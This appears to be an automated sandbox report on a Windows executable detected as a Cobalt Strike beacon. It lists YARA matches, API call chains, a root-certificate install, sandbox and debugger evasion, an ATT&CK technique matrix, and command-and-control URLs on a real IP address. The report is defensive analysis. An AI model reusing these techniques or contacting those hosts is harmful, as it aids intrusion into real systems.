          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00670B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_00670B70
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00673A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep, 0_2_00673A64
          Source: yZah650lHL.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\yZah650lHL.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: yZah650lHL.exe Virustotal: Detection: 80%
          Source: yZah650lHL.exe ReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\yZah650lHL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

          Data Obfuscation

          Source: C:\Users\user\Desktop\yZah650lHL.exe Unpacked PE file: 0.2.yZah650lHL.exe.660000.2.unpack
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_0066D83C
          Source: yZah650lHL.exe Static PE information: section name: .xdata
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_001D776C push 0000006Ah; retf 0_2_001D7784
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0069916C push 0000006Ah; retf 0_2_00699184

          Persistence and Installation Behavior

          Source: C:\Users\user\Desktop\yZah650lHL.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\Desktop\yZah650lHL.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_006801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006801A8
          Source: C:\Users\user\Desktop\yZah650lHL.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Users\user\Desktop\yZah650lHL.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\yZah650lHL.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00675854 0_2_00675854
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0066FA1C 0_2_0066FA1C
          Source: C:\Users\user\Desktop\yZah650lHL.exe Window / User API: threadDelayed 3936
          Source: C:\Users\user\Desktop\yZah650lHL.exe Window / User API: threadDelayed 5865
          Source: C:\Users\user\Desktop\yZah650lHL.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-37698
          Source: C:\Users\user\Desktop\yZah650lHL.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-37556
          Source: C:\Users\user\Desktop\yZah650lHL.exe API coverage: 6.6 %
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0066FA1C 0_2_0066FA1C
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576 Thread sleep count: 3936 > 30
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576 Thread sleep time: -39360000s >= -30000s
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6688 Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576 Thread sleep count: 5865 > 30
          Source: C:\Users\user\Desktop\yZah650lHL.exe TID: 6576 Thread sleep time: -58650000s >= -30000s
          Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\yZah650lHL.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\yZah650lHL.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_00679220
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_00671C30
          Source: C:\Users\user\Desktop\yZah650lHL.exe Thread delayed: delay time: 60000
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.000000000072C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
          Source: yZah650lHL.exe, 00000000.00000003.2495218353.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794858931.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1701127794.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1833140750.00000000007A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\yZah650lHL.exe API call chain: ExitProcess graph end node graph_0-37629

          Anti Debugging

          Source: C:\Users\user\Desktop\yZah650lHL.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_0-37297
          Source: C:\Users\user\Desktop\yZah650lHL.exe Process Stats: CPU usage > 42% for more than 60s
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0068F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte, 0_2_0068F810
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00689744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00689744
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_0066D83C
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_0068C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock, 0_2_0068C0C8
          Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA, 0_2_00401180
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_00401A70
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_004542E4 SetUnhandledExceptionFilter, 0_2_004542E4
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_00402F62 SetUnhandledExceptionFilter, 0_2_00402F62
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_006924F0 SetUnhandledExceptionFilter, 0_2_006924F0
          Source: C:\Users\user\Desktop\yZah650lHL.exe Code function: 0_2_006844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006844D0

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match; File source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_0067DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0067DF50
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00692050 AllocateAndInitializeSid,0_2_00692050
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Remote Access Functionality

          Source: Yara match; File source: Process Memory Space: yZah650lHL.exe PID: 6572, type: MEMORYSTR
          Source: Yara match; File source: 0.2.yZah650lHL.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.yZah650lHL.exe.1a0000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.yZah650lHL.exe.660000.2.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00676A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00676A78
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00676670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00676670
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_00692630 bind,0_2_00692630
          Source: C:\Users\user\Desktop\yZah650lHL.exe; Code function: 0_2_0067EE8C socket,closesocket,htons,bind,listen,0_2_0067EE8C

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 2 Valid Accounts | 2 Valid Accounts | 2 Valid Accounts | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 21 Access Token Manipulation | 1 Modify Registry | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Process Injection | 212 Virtualization/Sandbox Evasion | Security Account Manager | 341 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 21 Access Token Manipulation | NTDS | 212 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Process Injection | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Install Root Certificate | DCSync | 1 Account Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | 1 File and Directory Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 4 System Information Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

          Source | Detection | Scanner | Label | Link
          yZah650lHL.exe | 81% | Virustotal | | Browse
          yZah650lHL.exe | 87% | ReversingLabs | Win64.Backdoor.CobaltStrike |
          yZah650lHL.exe | 100% | Avira | HEUR/AGEN.1344321 |
          yZah650lHL.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          Name | Malicious | Antivirus Detection | Reputation
          https://42.192.3.170/dpixel | true | Avira URL Cloud: safe | unknown
          42.192.3.170 | true | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixel9yZah650lHL.exe, 00000000.00000003.3132490030.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/pixel1b87bd06yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420843896.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/pixelyZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/pixel9yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixelHPyZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3271622558.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/pixel(yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/yyZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixel=#yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1888943587.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 
00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2970624866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3094866758.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixeltzyZah650lHL.exe, 00000000.00000003.2495218353.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2077887934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364365771.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440036654.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039804636.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 
00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
